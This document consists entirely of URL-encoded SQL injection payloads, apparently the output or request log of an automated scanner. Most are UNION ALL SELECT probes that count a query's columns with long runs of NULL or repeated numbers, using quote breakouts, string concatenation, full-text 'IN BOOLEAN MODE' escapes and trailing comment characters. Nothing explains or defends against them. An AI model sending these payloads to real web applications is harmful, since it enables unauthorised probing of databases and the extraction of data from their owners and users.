1%27%7C%7C%28SELECT%20%27VKVN%27%20WHERE%202306%3D2306%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27Zjig%27%20WHERE%203420%3D3420%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27ddSx%27%20WHERE%208198%3D8198%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27vnbE%27%20WHERE%204860%3D4860%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27JLCV%27%20WHERE%203719%3D3719%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%7C%7C%28SELECT%20%27rnbM%27%20WHERE%201381%3D1381%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20PlnR%20WHERE%202073%3D2073%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20nJEy%20WHERE%209037%3D9037%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20iCGt%20WHERE%204891%3D4891%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20mrvp%20WHERE%205622%3D5622%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20vAnL%20WHERE%207781%3D7781%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20fDpp%20WHERE%202592%3D2592%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20wiSX%20WHERE%204508%3D4508%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20BEdf%20WHERE%202651%3D2651%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20NOKF%20WHERE%209033%3D9033%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20XWos%20WHERE%205179%3D5179%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27Ebzj%27%20WHERE%204040%3D4040%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27WlXA%27%20WHERE%203107%3D3107%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27KyVn%27%20WHERE%209741%3D9741%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27NRXo%27%20WHERE%208657%3D8657%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27iQhl%27%20WHERE%201700%3D1700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27RPgO%27%20WHERE%202889%3D2889%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27jQWl%27%20WHERE%208061%3D8061%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27pUqN%27%20WHERE%206278%3D6278%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27cPpG%27%20WHERE%205613%3D5613%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%2B%28SELECT%20%27uAez%27%20WHERE%208715%3D8715%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -9204%29%20UNION%20ALL%20SELECT%205185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%2C5185%23 -5762%29%20UNION%20ALL%20SELECT%201632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%23 -4908%29%20UNION%20ALL%20SELECT%205156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%2C5156%23 -4686%29%20UNION%20ALL%20SELECT%201553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%2C1553%23 -6819%29%20UNION%20ALL%20SELECT%203864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%2C3864%23 -9930%29%20UNION%20ALL%20SELECT%205174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%2C5174%23 -2943%29%20UNION%20ALL%20SELECT%207682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%23 -1756%29%20UNION%20ALL%20SELECT%203637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%2C3637%23 -9726%29%20UNION%20ALL%20SELECT%203066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%2C3066%23 -4307%29%20UNION%20ALL%20SELECT%203224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%2C3224%23 -9038%29%20UNION%20ALL%20SELECT%207238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%2C7238%23 -7759%29%20UNION%20ALL%20SELECT%209441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%2C9441%23 -6930%29%20UNION%20ALL%20SELECT%205514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%23 